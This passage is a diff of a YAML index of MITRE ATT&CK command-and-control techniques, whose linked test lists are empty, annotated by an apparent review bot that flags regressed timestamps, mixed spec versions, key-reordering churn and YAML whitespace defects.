- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071
atomic_tests: []
T1219:
@@ -37344,7 +37821,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1219
atomic_tests: []
T1659:
@@ -37408,11 +37884,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
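Review bot: `modified` on Traffic Signaling regresses from `2022-11-08T14:00:00.188Z` to `2022-10-19T23:08:40.603Z` with no other change to the object in this hunk. If the regeneration deliberately replaces batch-stamped timestamps with per-object ones, note that in the commit message; otherwise keep the later value so the object is not reported as rolled back.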
@@ -37496,7 +37971,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1572:
technique:
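Review bot: this object keeps `x_mitre_attack_spec_version: 2.1.0` while its `spec_version: '2.1'` is removed. Every other object touched in this file is already at 3.2.0 or is bumped to it (T1571 goes 3.1.0 → 3.2.0 below). Check whether this object was meant to be refreshed too or whether the 2.1.0 is intentional; a mixed-version file is awkward for tooling that validates against a single spec version.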
@@ -37527,7 +38001,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T17:15:35.372Z'
name: Protocol Tunneling
description: "Adversaries may tunnel network communications to and from a victim
system within a separate protocol to avoid detection/network filtering and/or
@@ -37547,8 +38021,8 @@ command-and-control:
encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
- [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
- further conceal C2 communications and infrastructure. "
+ [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+ to further conceal C2 communications and infrastructure. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -37570,8 +38044,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1572
atomic_tests: []
T1071.003:
@@ -37633,7 +38105,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1092:
technique:
@@ -37681,7 +38152,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090.002:
technique:
@@ -37735,7 +38205,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090:
technique:
@@ -37768,7 +38237,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T19:16:11.648Z'
name: Proxy
description: |-
Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
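Review bot: `modified` on Proxy goes backwards, `2022-04-25T14:00:00.188Z` → `2021-08-30T19:16:11.648Z`, with the description and references unchanged in this hunk. Same question as for the other backwards timestamps in this file: confirm the new value comes from the intended source bundle rather than an older one.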
@@ -37788,8 +38257,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1568:
technique:
@@ -37827,7 +38294,7 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:26:23.782Z'
name: Dynamic Resolution
description: |-
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37855,42 +38322,22 @@ command-and-control:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1102:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Anastasios Pingios
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- created: '2017-05-31T21:31:13.915Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1102
- url: https://attack.mitre.org/techniques/T1102
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-07T17:53:54.380Z'
name: Web Service
description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Sarathkumar Rajendran, Microsoft Defender365
+ x_mitre_deprecated: false
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
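Review bot: `x_mitre_permissions_required: [User]` is dropped from T1102 and nothing in this hunk replaces it; if the field has been retired upstream that is fine, but the removal is easy to miss inside a key reorder that also moves `x_mitre_platforms`, `x_mitre_domains`, `id`, `created` and `external_references` elsewhere in the object. The description change itself is sound: adding `cloud services` and `Microsoft` is backed by the new `Broadcom BirdyClient Microsoft Graph API 2024` citation, whose `external_references` entry appears in the following hunk, and `modified` advancing to `2024-10-07T17:53:54.380Z` is consistent with that edit. Suggest a YAML-aware diff when reviewing this object so the reorder and the real content change can be told apart.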
@@ -37899,17 +38346,39 @@ command-and-control:
for uncommon data flows (e.g., a client sending significantly more data than
it receives from a server). User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created: '2017-05-31T21:31:13.915Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1102
+ external_id: T1102
+ - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+ description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+ Graph API for C&C communication. Retrieved July 1, 2024.
+ url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1568.003:
technique:
@@ -37941,7 +38410,7 @@ command-and-control:
description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
Operations. Retrieved March 6, 2017.
url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T20:54:28.287Z'
name: DNS Calculation
description: |-
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -37958,8 +38427,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1104:
technique:
@@ -37979,7 +38446,7 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1104
external_id: T1104
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:43:38.181Z'
name: Multi-Stage Channels
description: |-
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -38002,8 +38469,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1205.001:
technique:
@@ -38028,7 +38493,7 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -38053,8 +38518,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.002:
technique:
@@ -38119,7 +38582,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1102.003:
technique:
@@ -38143,7 +38605,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:26:10.109Z'
name: One-Way Communication
description: |-
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -38168,21 +38630,36 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.003:
technique:
- modified: '2024-04-19T13:24:36.872Z'
+ modified: '2024-09-25T20:48:24.411Z'
name: 'Proxy: Multi-hop Proxy'
- description: |-
- Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
- For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
- In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
-
- Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+ description: "Adversaries may chain together multiple proxies to disguise the
+ source of malicious traffic. Typically, a defender will be able to identify
+ the last proxy traffic traversed before it enters their network; the defender
+ may or may not be able to identify any previous proxies before the last-hop
+ proxy. This technique makes identifying the original source of the malicious
+ traffic even more difficult by requiring the defender to trace malicious traffic
+ through several proxies to identify its source.\n\nFor example, adversaries
+ may construct or use onion routing networks – such as the publicly available
+ [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+ C2 traffic through a compromised population, allowing communication with any
+ device within the network.(Citation: Onion Routing) Adversaries may also use
+ operational relay box (ORB) networks composed of virtual private servers (VPS),
+ Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+ obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+ infrastructure, it is possible for an adversary to leverage multiple compromised
+ devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+ By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ on routers, adversaries can add custom code to the affected network devices
+ that will implement onion routing between those nodes. This method is dependent
+ upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+ method allowing the adversaries to cross the protected network boundary of
+ the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+ \ Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries
+ may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+ routing between a decentralized network of peers.(Citation: NGLite Trojan)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
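Review bot: re-emitting the T1090.003 description as a double-quoted folded string (instead of the `|-` block literal) introduces two whitespace defects visible in the hunk: `obfuscate their operations. (Citation: ORB Mandiant) \n\n` puts a space between the period and the citation, unlike every other citation in the file, and `\ Protocols such as ICMP` is an escaped leading space that will render as `WAN.  Protocols` with a double space. Suggest `...obfuscate their operations.(Citation: ORB Mandiant)\n\n` and dropping the `\ `. The ORB sentence itself is supported by the `ORB Mandiant` reference added in a later hunk, and the `x_mitre_version` bump to 2.2 is appropriate for a description change.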
@@ -38201,7 +38678,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -38215,6 +38692,11 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1090/003
external_id: T1090.003
+ - source_name: ORB Mandiant
+ description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+ Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+ July 8, 2024.
+ url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
- source_name: NGLite Trojan
description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -38228,12 +38710,11 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.003
atomic_tests: []
T1001:
technique:
- modified: '2024-02-02T19:04:35.389Z'
+ modified: '2024-10-07T15:07:47.232Z'
name: Data Obfuscation
description: 'Adversaries may obfuscate command and control traffic to make
it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -38283,11 +38764,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1571:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:37:57.868Z'
name: Non-Standard Port
description: |-
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -38296,20 +38776,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
@@ -38334,17 +38814,16 @@ command-and-control:
url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
- source_name: Fortinet Agent Tesla April 2018
description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
Variant. Retrieved November 5, 2018.
url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1571
atomic_tests: []
T1573:
@@ -38400,7 +38879,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1573
atomic_tests: []
T1102.002:
@@ -38425,7 +38903,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:15:47.861Z'
name: Bidirectional Communication
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
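Review bot: `modified` on Bidirectional Communication regresses from `2021-04-29T14:49:39.188Z` to `2020-03-26T23:15:47.861Z`; One-Way Communication above gets the same treatment (`2020-03-26T23:26:10.109Z`). Both new values are within minutes of each other on the day the sub-techniques were created, which supports the reading that the removed `.188Z` values were batch stamps, but please confirm against the source bundle and mention it in the commit message.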
@@ -38462,8 +38940,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1573.002:
technique:
@@ -38517,7 +38993,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1095:
technique:
@@ -38589,33 +39064,12 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1095
atomic_tests: []
T1001.003:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
- type: attack-pattern
- created: '2020-03-15T00:40:27.503Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1001.003
- url: https://attack.mitre.org/techniques/T1001/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
- name: Protocol Impersonation
+ modified: '2024-10-09T15:40:19.436Z'
+ name: Protocol or Service Impersonation
description: "Adversaries may impersonate legitimate protocols or web service
traffic to disguise command and control activity and thwart analysis efforts.
By impersonating legitimate protocols or web services, adversaries can make
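Review bot: the `-` block here removes `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the `external_references` list for T1001.003, while the `+` side re-adds only `modified` and the renamed `name: Protocol or Service Impersonation`. Those removed keys have to reappear in the following hunk for the object to stay valid, so review the two hunks together (a key-order-insensitive YAML diff would show whether anything other than the rename and `modified` actually changed). The rename itself is consistent with the `[Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)` link text updated in T1572 earlier in this file.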
@@ -38623,23 +39077,61 @@ command-and-control:
\ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
like subsequent traffic is SSL/TLS encrypted, potentially interfering with
some security tooling, or to make the traffic look like it is related with
- a trusted entity. "
+ a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+ impersonate expected web traffic or trusted services. For example, adversaries
+ may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+ data to disguise C2 communications or mimic legitimate services such as Gmail,
+ Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+ Malleable-C2-U42)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - James Emery-Callcott, Emerging Threats Team, Proofpoint
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+ created: '2020-03-15T00:40:27.503Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1001/003
+ external_id: T1001.003
+ - source_name: Malleable-C2-U42
+ description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+ Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+ How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+ September 24, 2024.'
+ url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ - source_name: ESET Okrum July 2019
+ description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+ RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1090.004:
technique:
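Review bot: most of this hunk is key reordering, not content: the `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` entries removed for T1001.003 in the previous hunk come back here with identical values, while the actual changes (the new description paragraph, the James Emery-Callcott contributor, `x_mitre_version: '2.0'`, `x_mitre_attack_spec_version: 3.2.0` and the two new citations) are buried in the churn. If the generator that syncs this file from the ATT&CK STIX bundle emitted mapping keys in a fixed order, an upstream refresh would produce a diff that can actually be reviewed; worth a follow-up on the generator. Separately, the Malleable-C2-U42 citation runs the author names together with no separators; that string comes from the upstream bundle, so do not hand-edit it here, raise it at the source.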
@@ -38686,7 +39178,6 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1132:
technique:
@@ -38746,7 +39237,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.002:
technique:
